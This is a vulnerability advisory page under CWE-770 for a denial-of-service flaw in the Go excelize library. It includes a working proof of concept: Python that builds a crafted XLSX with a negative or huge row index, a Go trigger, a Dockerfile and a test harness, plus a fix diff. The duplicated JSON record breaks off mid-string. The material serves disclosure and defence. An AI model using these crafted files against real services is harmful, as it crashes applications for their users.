CWE-770
AllowedAllocation of Resources Without Limits or Throttling
Abstraction: Base · Status: Incomplete
The product allocates a reusable resource or group of resources on behalf of an actor without imposing any intended restrictions on the size or number of resources that can be allocated.
3025 vulnerabilities reference this CWE, most recent first.
GHSA-H69G-9HX6-F3V4
Vulnerability from github – Published: 2026-07-10 19:25 – Updated: 2026-07-10 19:25Unbounded Row Index Allocation in Worksheet Parser (checkSheet OOM/Panic DoS)
Summary
The checkSheet() function in github.com/xuri/excelize/v2 uses an attacker-controlled <row r="N"> XML attribute value directly as the length argument to make([]xlsxRow, row) without validating it against the Excel row limit (TotalRows = 1,048,576). A specially crafted XLSX file can trigger two denial-of-service variants: (A) an out-of-memory process kill when r=2147483647 forces a ~16 GB allocation attempt, and (B) a runtime panic via out-of-bounds slice indexing when r=-1. Any service that opens attacker-supplied XLSX files and calls GetCellValue is affected. No authentication is required.
Details
The vulnerable code path is triggered by calling GetCellValue (or any API that internally invokes workSheetReader) on an XLSX file containing a crafted worksheet row element.
Data flow (source → sink):
excelize.go:186-193—OpenReaderreads attacker-controlled spreadsheet bytes.excelize.go:216-223— ZIP reader is created and passed toReadZipReader.lib.go:43-77— ZIP entries are read intofileList; worksheet XML is stored by part name.excelize.go:228-229— XML bytes are stored inf.Pkg.cell.go:71-79— PublicGetCellValueenters the worksheet value-read path.cell.go:1492-1494—getCellStringFunccallsworkSheetReader.excelize.go:313-324— Worksheet XML is decoded intoxlsxWorksheet.xmlWorksheet.go:302-312—<row r="...">is deserialized intoxlsxRow.R intwith no validation (source).excelize.go:357-377—checkSheet()accumulates the maximumrvalue; sink:make([]xlsxRow, row)allocates a slice of that size before any bounds check.
Vulnerable code (excelize.go:373-377):
if r.R != 0 && r.R > row {
row = r.R
}
sheetData := xlsxSheetData{Row: make([]xlsxRow, row)} // unbounded allocation
The constant TotalRows = 1048576 is defined in templates.go:190 but is never applied before the make() call in checkSheet(), leaving the allocation fully attacker-controlled.
Variant A (r = 2147483647): make([]xlsxRow, 2147483647) attempts to allocate approximately 16 GB of memory. The Go runtime terminates the process with fatal error: runtime: out of memory.
Variant B (r = -1): The first loop in checkSheet() leaves row = 0 because the condition r.R != 0 is false for r.R = -1. The second loop then executes sheetData.Row[r.R-1], which evaluates to sheetData.Row[-2], triggering runtime error: index out of range [-2] at excelize.go:381.
Dynamic reproduction confirmed both variants inside a memory-limited Docker container (256 MB). The full panic stack trace for Variant B is:
panic: runtime error: index out of range [-2]
goroutine 1 [running]:
github.com/xuri/excelize/v2.(*xlsxWorksheet).checkSheet(...)
/excelize/excelize.go:381
github.com/xuri/excelize/v2.(*File).workSheetReader(...)
/excelize/excelize.go:329
github.com/xuri/excelize/v2.(*File).getCellStringFunc(...)
/excelize/cell.go:1494
github.com/xuri/excelize/v2.(*File).GetCellValue(...)
/excelize/cell.go:72
main.main.func1(...)
/excelize/cmd/poc/main.go:44
main.main()
/excelize/cmd/poc/main.go:52
Recommended remediation (excelize.go):
-func (ws *xlsxWorksheet) checkSheet() {
+func (ws *xlsxWorksheet) checkSheet() error {
...
for i := 0; i < len(ws.SheetData.Row); i++ {
r := ws.SheetData.Row[i]
+ if r.R < 0 {
+ return newInvalidRowNumberError(r.R)
+ }
+ if r.R > TotalRows {
+ return ErrMaxRows
+ }
...
ws.SheetData = *sheetData
+ return nil
}
PoC
Step 1: Generate the malicious XLSX
import zipfile
# Variant A: OOM → row = "2147483647"
# Variant B: Panic → row = "-1"
row = "-1"
with zipfile.ZipFile("malicious.xlsx", "w", zipfile.ZIP_DEFLATED) as z:
z.writestr("[Content_Types].xml", '''<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
<Default Extension="xml" ContentType="application/xml"/>
<Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/>
<Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
</Types>''')
z.writestr("_rels/.rels", '''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml"/>
</Relationships>''')
z.writestr("xl/workbook.xml", '''<?xml version="1.0" encoding="UTF-8"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/></sheets>
</workbook>''')
z.writestr("xl/_rels/workbook.xml.rels", '''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>
</Relationships>''')
z.writestr("xl/worksheets/sheet1.xml", f'''<?xml version="1.0" encoding="UTF-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
<sheetData><row r="{row}"><c r="A1"><v>1</v></c></row></sheetData>
</worksheet>''')
Step 2: Trigger the vulnerability
package main
import "github.com/xuri/excelize/v2"
func main() {
f, err := excelize.OpenFile("malicious.xlsx")
if err != nil { panic(err) }
defer f.Close()
_, err = f.GetCellValue("Sheet1", "A1") // triggers checkSheet() → unbounded make()
if err != nil { panic(err) }
}
Expected results:
- Variant A (r="2147483647"): process is killed by the OOM killer (fatal error: runtime: out of memory or exit code 137).
- Variant B (r="-1"): process panics with runtime error: index out of range [-2] at excelize.go:381 (exit code 2).
Both variants were confirmed in a Docker container with --memory 256m --memory-swap 256m. The malicious XLSX payload is a few hundred bytes.
Impact
This is a Denial-of-Service vulnerability. An unauthenticated remote attacker can crash or memory-exhaust any Go application that uses github.com/xuri/excelize/v2 to open attacker-supplied XLSX files and subsequently calls any cell-reading API (GetCellValue, GetRows, GetCols, or any function that internally triggers workSheetReader).
Who is impacted: - Web services with XLSX upload or import endpoints (document processors, data pipelines, BI tools). - CLI tools or batch jobs that parse user-supplied spreadsheet files. - Any application using the library to handle untrusted XLSX documents.
The attack requires no authentication and no user interaction beyond uploading a malicious file. The payload is a minimal well-formed ZIP of a few hundred bytes, making it trivial to construct and deliver. Repeated or concurrent exploitation can permanently deny service to all users of the affected application.
Reproduction artifacts
Dockerfile
# Dockerfile for VULN-001: Unbounded Row Index Allocation in excelize checkSheet()
# CWE-770 — Allocation of Resources Without Limits or Throttling
# Target: github.com/xuri/excelize/v2 @ commit f4a068b
#
# Exploit path:
# GetCellValue -> getCellStringFunc -> workSheetReader -> checkSheet()
# In checkSheet() (excelize.go:341-393), the attacker-controlled <row r="N">
# attribute is used directly as make([]xlsxRow, row) size with no bounds check.
#
# Variant A (r=2147483647): OOM — make([]xlsxRow, 2147483647) exhausts memory
# Variant B (r=-1): Panic — second loop does sheetData.Row[-2] (index OOB)
FROM golang:latest AS builder
# Copy the vulnerable excelize library source (serves as the Go module)
COPY repo/ /excelize/
# Copy the exploit main package written by poc.py
COPY vuln-001/exploit_main.go /excelize/cmd/poc/main.go
WORKDIR /excelize
# Build the exploit binary.
# -mod=mod: allow Go to update go.sum for any transitive deps.
# CGO_ENABLED=0: produce a statically-linked binary for the runtime stage.
RUN CGO_ENABLED=0 GOFLAGS="-mod=mod" go build -o /poc ./cmd/poc/
# Minimal runtime stage (golang image provides a libc for cgo-free binary too)
FROM golang:latest
COPY --from=builder /poc /poc
ENTRYPOINT ["/poc"]
poc.py
#!/usr/bin/env python3
"""
PoC for VULN-001: Unbounded Row Index Allocation in excelize checkSheet()
CWE-770 — Allocation of Resources Without Limits or Throttling
Repository: qax-os/excelize Commit: f4a068b
Exploit mechanism:
xlsxWorksheet.checkSheet() (excelize.go:341-393) iterates worksheet rows and
uses the attacker-controlled <row r="N"> attribute directly as the length
argument to make([]xlsxRow, row) without any bounds validation against
TotalRows (1,048,576).
Variant A (r=2147483647): make([]xlsxRow, 2^31-1) → OOM / fatal error
Variant B (r=-1): first loop leaves row=0; second loop executes
sheetData.Row[-1-1] → runtime panic: index out of range
This script:
1. Writes exploit_main.go (the Go PoC binary source).
2. Creates two malicious XLSX files (one per variant).
3. Builds the Docker image.
4. Runs each variant and captures evidence.
5. Writes phase2_result.json with verdict.
"""
import json
import os
import subprocess
import sys
import textwrap
import zipfile
# ---------------------------------------------------------------------------
# Paths
# ---------------------------------------------------------------------------
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
PARENT_DIR = os.path.dirname(BASE_DIR) # Docker build context
RESULT_FILE = os.path.join(BASE_DIR, "phase2_result.json")
DOCKERFILE = os.path.join(BASE_DIR, "Dockerfile")
IMAGE_NAME = "excelize-poc-vuln001"
EXPLOIT_SRC = os.path.join(BASE_DIR, "exploit_main.go")
PANIC_XLSX = os.path.join(BASE_DIR, "row_negative.xlsx")
OOM_XLSX = os.path.join(BASE_DIR, "row_maxint.xlsx")
# ---------------------------------------------------------------------------
# Step 1 — Write the Go exploit source
# ---------------------------------------------------------------------------
EXPLOIT_GO = textwrap.dedent("""\
// exploit_main.go — PoC for VULN-001
// Triggers excelize checkSheet() unbounded allocation via malicious XLSX.
package main
import (
\t"fmt"
\t"os"
\t"runtime/debug"
\texcelize "github.com/xuri/excelize/v2"
)
func main() {
\tif len(os.Args) < 2 {
\t\tfmt.Fprintln(os.Stderr, "Usage: poc <xlsx_file>")
\t\tos.Exit(1)
\t}
\tpath := os.Args[1]
\tfmt.Printf("[*] Opening: %s\\n", path)
\t// Wrap the call so we can print a structured panic message before exiting.
\t// The panic itself is the evidence of exploitability.
\tfunc() {
\t\tdefer func() {
\t\t\tif r := recover(); r != nil {
\t\t\t\tfmt.Println("[VULN] PANIC CAUGHT — vulnerability confirmed")
\t\t\t\tfmt.Printf("[VULN] panic value: %v\\n", r)
\t\t\t\tfmt.Println("[VULN] Stack trace:")
\t\t\t\tdebug.PrintStack()
\t\t\t\tos.Exit(2) // exit 2 = exploitable crash (panic)
\t\t\t}
\t\t}()
\t\tf, err := excelize.OpenFile(path)
\t\tif err != nil {
\t\t\tfmt.Printf("[!] OpenFile error: %v\\n", err)
\t\t\tos.Exit(1)
\t\t}
\t\tdefer f.Close()
\t\t// GetCellValue → getCellStringFunc → workSheetReader → checkSheet()
\t\t// checkSheet() is the sink: make([]xlsxRow, row) where row is attacker-controlled.
\t\tfmt.Println("[*] Calling GetCellValue — entering checkSheet() sink")
\t\tval, err := f.GetCellValue("Sheet1", "A1")
\t\tif err != nil {
\t\t\t// Some errors surface instead of panicking (e.g. allocation failures
\t\t\t// that Go converts to errors in some configurations).
\t\t\tfmt.Printf("[!] GetCellValue error: %v\\n", err)
\t\t\tos.Exit(3) // exit 3 = error path (still abnormal)
\t\t}
\t\tfmt.Printf("[*] GetCellValue returned normally, value=%q (no crash)\\n", val)
\t}()
}
""")
def write_exploit_source() -> None:
with open(EXPLOIT_SRC, "w") as fh:
fh.write(EXPLOIT_GO)
print(f"[+] Wrote exploit source: {EXPLOIT_SRC}")
# ---------------------------------------------------------------------------
# Step 2 — Build malicious XLSX files
# ---------------------------------------------------------------------------
CONTENT_TYPES = (
'<?xml version="1.0" encoding="UTF-8"?>'
'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
'<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
'<Default Extension="xml" ContentType="application/xml"/>'
'<Override PartName="/xl/workbook.xml"'
' ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/>'
'<Override PartName="/xl/worksheets/sheet1.xml"'
' ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>'
'</Types>'
)
RELS = (
'<?xml version="1.0" encoding="UTF-8"?>'
'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
'<Relationship Id="rId1"'
' Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument"'
' Target="xl/workbook.xml"/>'
'</Relationships>'
)
WORKBOOK = (
'<?xml version="1.0" encoding="UTF-8"?>'
'<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"'
' xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
'<sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/></sheets>'
'</workbook>'
)
WORKBOOK_RELS = (
'<?xml version="1.0" encoding="UTF-8"?>'
'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
'<Relationship Id="rId1"'
' Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet"'
' Target="worksheets/sheet1.xml"/>'
'</Relationships>'
)
def sheet_xml(row_r: str) -> str:
return (
'<?xml version="1.0" encoding="UTF-8"?>'
'<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
f'<sheetData><row r="{row_r}"><c r="A1"><v>1</v></c></row></sheetData>'
'</worksheet>'
)
def build_xlsx(path: str, row_r: str) -> None:
with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as z:
z.writestr("[Content_Types].xml", CONTENT_TYPES)
z.writestr("_rels/.rels", RELS)
z.writestr("xl/workbook.xml", WORKBOOK)
z.writestr("xl/_rels/workbook.xml.rels", WORKBOOK_RELS)
z.writestr("xl/worksheets/sheet1.xml", sheet_xml(row_r))
print(f"[+] Created {os.path.basename(path)} (row r={row_r!r})")
# ---------------------------------------------------------------------------
# Step 3 — Docker helpers
# ---------------------------------------------------------------------------
def run_cmd(cmd: list, timeout: int = 600) -> subprocess.CompletedProcess:
print(f"[>] {' '.join(str(x) for x in cmd)}")
return subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=timeout,
)
def docker_build() -> tuple[bool, str]:
result = run_cmd(
[
"docker", "build",
"--no-cache",
"-f", DOCKERFILE,
"-t", IMAGE_NAME,
PARENT_DIR,
],
timeout=600,
)
combined = result.stdout + result.stderr
if result.returncode != 0:
print(f"[-] docker build FAILED (rc={result.returncode})")
print(combined[-4000:])
return False, combined
print("[+] Docker image built successfully")
return True, combined
def docker_run_variant(label: str, xlsx_path: str, mem: str = "256m", timeout: int = 90) -> dict:
"""Run the exploit container against one XLSX file and return analysis dict."""
cmd = [
"docker", "run", "--rm",
"--memory", mem,
"--memory-swap", mem,
"-v", f"{xlsx_path}:/input.xlsx:ro",
IMAGE_NAME,
"/input.xlsx",
]
run_cmd_str = " ".join(cmd)
try:
result = run_cmd(cmd, timeout=timeout)
rc = result.returncode
stdout = result.stdout or ""
stderr = result.stderr or ""
except subprocess.TimeoutExpired:
rc = -99
stdout = ""
stderr = f"TIMEOUT after {timeout}s"
combined = stdout + stderr
print(f"\n--- {label} ---")
print(f" exit code : {rc}")
print(f" stdout : {stdout[:1200]}")
print(f" stderr : {stderr[:1200]}")
is_panic = any(kw in combined for kw in (
"index out of range",
"PANIC CAUGHT",
"runtime error",
"goroutine ",
"panic:",
))
is_oom = any(kw in combined for kw in (
"out of memory",
"cannot allocate",
"fatal error",
"makeslice",
)) or rc == 137
# exit 2 = panic caught; exit 137 = OOM kill; exit 3 = error path
crashed = rc != 0 and (is_panic or is_oom or rc in (2, 3, 137))
return {
"label": label,
"rc": rc,
"is_panic": is_panic,
"is_oom": is_oom,
"crashed": crashed,
"run_cmd": run_cmd_str,
"snippet": combined[:1500].strip(),
}
# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------
def main() -> None:
print("=" * 65)
print("VULN-001 PoC — excelize checkSheet() unbounded allocation DoS")
print("=" * 65)
# 1. Write Go exploit source (needed before docker build)
write_exploit_source()
# 2. Create malicious XLSX payloads
build_xlsx(PANIC_XLSX, "-1") # Variant B: index OOB panic
build_xlsx(OOM_XLSX, "2147483647") # Variant A: 2 GB+ make() → OOM
# 3. Build Docker image
build_cmd = (
f"docker build --no-cache -f {DOCKERFILE} -t {IMAGE_NAME} {PARENT_DIR}"
)
build_ok, build_out = docker_build()
if not build_ok:
payload = {
"passed": False,
"verdict": "FAIL",
"reason": (
"Docker 이미지 빌드에 실패했습니다. golang:latest 이미지가 go.mod의 "
"'go 1.25.0' 요건을 충족하지 않을 수 있습니다. Dockerfile에서 "
"'golang:1.25' 등 명시적 버전 태그로 교체 후 재시도 바랍니다."
),
"build_command": build_cmd,
"run_command": "",
"poc_command": f"python3 {os.path.abspath(__file__)}",
"evidence": build_out[-2000:],
"artifacts": ["Dockerfile", "poc.py"],
}
with open(RESULT_FILE, "w") as fh:
json.dump(payload, fh, indent=2, ensure_ascii=False)
print(f"\n[!] FAIL result → {RESULT_FILE}")
sys.exit(1)
# 4. Run both variants
ev_panic = docker_run_variant(
"Variant B — r=-1 (index out of range panic)", PANIC_XLSX, mem="256m")
ev_oom = docker_run_variant(
"Variant A — r=2147483647 (OOM)", OOM_XLSX, mem="256m")
# 5. Verdict
passed = ev_panic["crashed"] or ev_oom["crashed"]
if ev_panic["crashed"]:
primary, primary_ev = "B (r=-1, panic)", ev_panic
elif ev_oom["crashed"]:
primary, primary_ev = "A (r=2147483647, OOM)", ev_oom
else:
primary, primary_ev = "B (r=-1, panic)", ev_panic # best-effort
if passed:
reason = (
f"실행 결과 비정상 종료 확인됨 (주요 variant: {primary}). "
f"Variant B(r=-1): rc={ev_panic['rc']}, panic={ev_panic['is_panic']}; "
f"Variant A(r=2147483647): rc={ev_oom['rc']}, oom={ev_oom['is_oom']}. "
"excelize.go:377 make([]xlsxRow, row)에 대한 bounds 검증 부재가 "
"컨테이너 내 실제 DoS(패닉/OOM)를 유발함을 실행으로 증명."
)
verdict = "PASS"
else:
reason = (
"컨테이너 실행이 완료되었으나 충돌(패닉/OOM) 증거가 관측되지 않음. "
f"Variant B rc={ev_panic['rc']}, Variant A rc={ev_oom['rc']}. "
"가능한 원인: (1) Go 런타임이 make() 실패를 panic 대신 error로 반환, "
"(2) 메모리 한도 초과 전 OOM killer가 작동하지 않음. "
"다음을 시도: --memory 64m으로 재실행, 또는 호스트에서 직접 Go 빌드 후 실행."
)
verdict = "FAIL"
phase2 = {
"passed": passed,
"verdict": verdict,
"reason": reason,
"build_command": build_cmd,
"run_command": primary_ev["run_cmd"],
"poc_command": f"python3 {os.path.abspath(__file__)}",
"evidence": primary_ev["snippet"],
"artifacts": ["Dockerfile", "poc.py"],
}
with open(RESULT_FILE, "w") as fh:
json.dump(phase2, fh, indent=2, ensure_ascii=False)
print(f"\n{'='*65}")
print(f"Verdict : {verdict} (passed={passed})")
print(f"Result → {RESULT_FILE}")
print("=" * 65)
if __name__ == "__main__":
main()
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/xuri/excelize/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.11.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-54063"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-10T19:25:20Z",
"nvd_published_at": "2026-07-10T17:16:58Z",
"severity": "HIGH"
},
"details": "## Unbounded Row Index Allocation in Worksheet Parser (checkSheet OOM/Panic DoS)\n\n### Summary\nThe `checkSheet()` function in `github.com/xuri/excelize/v2` uses an attacker-controlled `\u003crow r=\"N\"\u003e` XML attribute value directly as the length argument to `make([]xlsxRow, row)` without validating it against the Excel row limit (`TotalRows = 1,048,576`). A specially crafted XLSX file can trigger two denial-of-service variants: (A) an out-of-memory process kill when `r=2147483647` forces a ~16 GB allocation attempt, and (B) a runtime panic via out-of-bounds slice indexing when `r=-1`. Any service that opens attacker-supplied XLSX files and calls `GetCellValue` is affected. No authentication is required.\n\n### Details\nThe vulnerable code path is triggered by calling `GetCellValue` (or any API that internally invokes `workSheetReader`) on an XLSX file containing a crafted worksheet row element.\n\n**Data flow (source \u2192 sink):**\n\n1. `excelize.go:186-193` \u2014 `OpenReader` reads attacker-controlled spreadsheet bytes.\n2. `excelize.go:216-223` \u2014 ZIP reader is created and passed to `ReadZipReader`.\n3. `lib.go:43-77` \u2014 ZIP entries are read into `fileList`; worksheet XML is stored by part name.\n4. `excelize.go:228-229` \u2014 XML bytes are stored in `f.Pkg`.\n5. `cell.go:71-79` \u2014 Public `GetCellValue` enters the worksheet value-read path.\n6. `cell.go:1492-1494` \u2014 `getCellStringFunc` calls `workSheetReader`.\n7. `excelize.go:313-324` \u2014 Worksheet XML is decoded into `xlsxWorksheet`.\n8. `xmlWorksheet.go:302-312` \u2014 `\u003crow r=\"...\"\u003e` is deserialized into `xlsxRow.R int` with no validation (source).\n9. `excelize.go:357-377` \u2014 `checkSheet()` accumulates the maximum `r` value; **sink**: `make([]xlsxRow, row)` allocates a slice of that size before any bounds check.\n\n**Vulnerable code (`excelize.go:373-377`):**\n```go\nif r.R != 0 \u0026\u0026 r.R \u003e row {\n row = r.R\n}\nsheetData := xlsxSheetData{Row: make([]xlsxRow, row)} // unbounded allocation\n```\n\nThe constant `TotalRows = 1048576` is defined in `templates.go:190` but is never applied before the `make()` call in `checkSheet()`, leaving the allocation fully attacker-controlled.\n\n**Variant A (`r = 2147483647`):** `make([]xlsxRow, 2147483647)` attempts to allocate approximately 16 GB of memory. The Go runtime terminates the process with `fatal error: runtime: out of memory`.\n\n**Variant B (`r = -1`):** The first loop in `checkSheet()` leaves `row = 0` because the condition `r.R != 0` is false for `r.R = -1`. The second loop then executes `sheetData.Row[r.R-1]`, which evaluates to `sheetData.Row[-2]`, triggering `runtime error: index out of range [-2]` at `excelize.go:381`.\n\nDynamic reproduction confirmed both variants inside a memory-limited Docker container (256 MB). The full panic stack trace for Variant B is:\n```\npanic: runtime error: index out of range [-2]\n\ngoroutine 1 [running]:\ngithub.com/xuri/excelize/v2.(*xlsxWorksheet).checkSheet(...)\n /excelize/excelize.go:381\ngithub.com/xuri/excelize/v2.(*File).workSheetReader(...)\n /excelize/excelize.go:329\ngithub.com/xuri/excelize/v2.(*File).getCellStringFunc(...)\n /excelize/cell.go:1494\ngithub.com/xuri/excelize/v2.(*File).GetCellValue(...)\n /excelize/cell.go:72\nmain.main.func1(...)\n /excelize/cmd/poc/main.go:44\nmain.main()\n /excelize/cmd/poc/main.go:52\n```\n\n**Recommended remediation (`excelize.go`):**\n```diff\n-func (ws *xlsxWorksheet) checkSheet() {\n+func (ws *xlsxWorksheet) checkSheet() error {\n ...\n for i := 0; i \u003c len(ws.SheetData.Row); i++ {\n r := ws.SheetData.Row[i]\n+ if r.R \u003c 0 {\n+ return newInvalidRowNumberError(r.R)\n+ }\n+ if r.R \u003e TotalRows {\n+ return ErrMaxRows\n+ }\n ...\n ws.SheetData = *sheetData\n+ return nil\n }\n```\n\n### PoC\n\n**Step 1: Generate the malicious XLSX**\n\n```python\nimport zipfile\n\n# Variant A: OOM \u2192 row = \"2147483647\"\n# Variant B: Panic \u2192 row = \"-1\"\nrow = \"-1\"\n\nwith zipfile.ZipFile(\"malicious.xlsx\", \"w\", zipfile.ZIP_DEFLATED) as z:\n z.writestr(\"[Content_Types].xml\", \u0027\u0027\u0027\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003cTypes xmlns=\"http://schemas.openxmlformats.org/package/2006/content-types\"\u003e\n\u003cDefault Extension=\"rels\" ContentType=\"application/vnd.openxmlformats-package.relationships+xml\"/\u003e\n\u003cDefault Extension=\"xml\" ContentType=\"application/xml\"/\u003e\n\u003cOverride PartName=\"/xl/workbook.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml\"/\u003e\n\u003cOverride PartName=\"/xl/worksheets/sheet1.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml\"/\u003e\n\u003c/Types\u003e\u0027\u0027\u0027)\n z.writestr(\"_rels/.rels\", \u0027\u0027\u0027\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003cRelationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"\u003e\n\u003cRelationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument\" Target=\"xl/workbook.xml\"/\u003e\n\u003c/Relationships\u003e\u0027\u0027\u0027)\n z.writestr(\"xl/workbook.xml\", \u0027\u0027\u0027\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003cworkbook xmlns=\"http://schemas.openxmlformats.org/spreadsheetml/2006/main\"\n xmlns:r=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships\"\u003e\n\u003csheets\u003e\u003csheet name=\"Sheet1\" sheetId=\"1\" r:id=\"rId1\"/\u003e\u003c/sheets\u003e\n\u003c/workbook\u003e\u0027\u0027\u0027)\n z.writestr(\"xl/_rels/workbook.xml.rels\", \u0027\u0027\u0027\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003cRelationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"\u003e\n\u003cRelationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet\" Target=\"worksheets/sheet1.xml\"/\u003e\n\u003c/Relationships\u003e\u0027\u0027\u0027)\n z.writestr(\"xl/worksheets/sheet1.xml\", f\u0027\u0027\u0027\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003cworksheet xmlns=\"http://schemas.openxmlformats.org/spreadsheetml/2006/main\"\u003e\n\u003csheetData\u003e\u003crow r=\"{row}\"\u003e\u003cc r=\"A1\"\u003e\u003cv\u003e1\u003c/v\u003e\u003c/c\u003e\u003c/row\u003e\u003c/sheetData\u003e\n\u003c/worksheet\u003e\u0027\u0027\u0027)\n```\n\n**Step 2: Trigger the vulnerability**\n\n```go\npackage main\n\nimport \"github.com/xuri/excelize/v2\"\n\nfunc main() {\n f, err := excelize.OpenFile(\"malicious.xlsx\")\n if err != nil { panic(err) }\n defer f.Close()\n _, err = f.GetCellValue(\"Sheet1\", \"A1\") // triggers checkSheet() \u2192 unbounded make()\n if err != nil { panic(err) }\n}\n```\n\n**Expected results:**\n- Variant A (`r=\"2147483647\"`): process is killed by the OOM killer (`fatal error: runtime: out of memory` or exit code 137).\n- Variant B (`r=\"-1\"`): process panics with `runtime error: index out of range [-2]` at `excelize.go:381` (exit code 2).\n\nBoth variants were confirmed in a Docker container with `--memory 256m --memory-swap 256m`. The malicious XLSX payload is a few hundred bytes.\n\n### Impact\n\nThis is a **Denial-of-Service** vulnerability. An unauthenticated remote attacker can crash or memory-exhaust any Go application that uses `github.com/xuri/excelize/v2` to open attacker-supplied XLSX files and subsequently calls any cell-reading API (`GetCellValue`, `GetRows`, `GetCols`, or any function that internally triggers `workSheetReader`).\n\n**Who is impacted:**\n- Web services with XLSX upload or import endpoints (document processors, data pipelines, BI tools).\n- CLI tools or batch jobs that parse user-supplied spreadsheet files.\n- Any application using the library to handle untrusted XLSX documents.\n\nThe attack requires no authentication and no user interaction beyond uploading a malicious file. The payload is a minimal well-formed ZIP of a few hundred bytes, making it trivial to construct and deliver. Repeated or concurrent exploitation can permanently deny service to all users of the affected application.\n\n### Reproduction artifacts\n\n#### `Dockerfile`\n\n```dockerfile\n# Dockerfile for VULN-001: Unbounded Row Index Allocation in excelize checkSheet()\n# CWE-770 \u2014 Allocation of Resources Without Limits or Throttling\n# Target: github.com/xuri/excelize/v2 @ commit f4a068b\n#\n# Exploit path:\n# GetCellValue -\u003e getCellStringFunc -\u003e workSheetReader -\u003e checkSheet()\n# In checkSheet() (excelize.go:341-393), the attacker-controlled \u003crow r=\"N\"\u003e\n# attribute is used directly as make([]xlsxRow, row) size with no bounds check.\n#\n# Variant A (r=2147483647): OOM \u2014 make([]xlsxRow, 2147483647) exhausts memory\n# Variant B (r=-1): Panic \u2014 second loop does sheetData.Row[-2] (index OOB)\n\nFROM golang:latest AS builder\n\n# Copy the vulnerable excelize library source (serves as the Go module)\nCOPY repo/ /excelize/\n\n# Copy the exploit main package written by poc.py\nCOPY vuln-001/exploit_main.go /excelize/cmd/poc/main.go\n\nWORKDIR /excelize\n\n# Build the exploit binary.\n# -mod=mod: allow Go to update go.sum for any transitive deps.\n# CGO_ENABLED=0: produce a statically-linked binary for the runtime stage.\nRUN CGO_ENABLED=0 GOFLAGS=\"-mod=mod\" go build -o /poc ./cmd/poc/\n\n# Minimal runtime stage (golang image provides a libc for cgo-free binary too)\nFROM golang:latest\nCOPY --from=builder /poc /poc\nENTRYPOINT [\"/poc\"]\n```\n\n#### `poc.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPoC for VULN-001: Unbounded Row Index Allocation in excelize checkSheet()\nCWE-770 \u2014 Allocation of Resources Without Limits or Throttling\nRepository: qax-os/excelize Commit: f4a068b\n\nExploit mechanism:\n xlsxWorksheet.checkSheet() (excelize.go:341-393) iterates worksheet rows and\n uses the attacker-controlled \u003crow r=\"N\"\u003e attribute directly as the length\n argument to make([]xlsxRow, row) without any bounds validation against\n TotalRows (1,048,576).\n\n Variant A (r=2147483647): make([]xlsxRow, 2^31-1) \u2192 OOM / fatal error\n Variant B (r=-1): first loop leaves row=0; second loop executes\n sheetData.Row[-1-1] \u2192 runtime panic: index out of range\n\nThis script:\n 1. Writes exploit_main.go (the Go PoC binary source).\n 2. Creates two malicious XLSX files (one per variant).\n 3. Builds the Docker image.\n 4. Runs each variant and captures evidence.\n 5. Writes phase2_result.json with verdict.\n\"\"\"\n\nimport json\nimport os\nimport subprocess\nimport sys\nimport textwrap\nimport zipfile\n\n# ---------------------------------------------------------------------------\n# Paths\n# ---------------------------------------------------------------------------\nBASE_DIR = 